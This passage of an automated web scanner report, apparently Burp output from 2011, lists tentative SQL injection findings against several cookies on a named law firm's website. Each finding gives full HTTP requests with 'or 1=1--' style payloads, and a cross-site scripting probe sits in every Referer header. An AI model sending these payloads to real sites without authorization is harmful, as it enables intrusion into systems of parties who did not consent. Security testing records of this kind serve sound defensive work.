The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 14571208'%20or%201%3d1--%20 and 14571208'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d1--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Thu, 13-May-2010 00:34:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d2--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 15918602'%20or%201%3d1--%20 and 15918602'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Thu, 13-May-2010 00:35:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 20857946'%20or%201%3d1--%20 and 20857946'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Thu, 13-May-2010 00:34:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 15919628'%20or%201%3d1--%20 and 15919628'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Thu, 13-May-2010 00:34:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 17968108'%20or%201%3d1--%20 and 17968108'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Thu, 13-May-2010 00:35:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
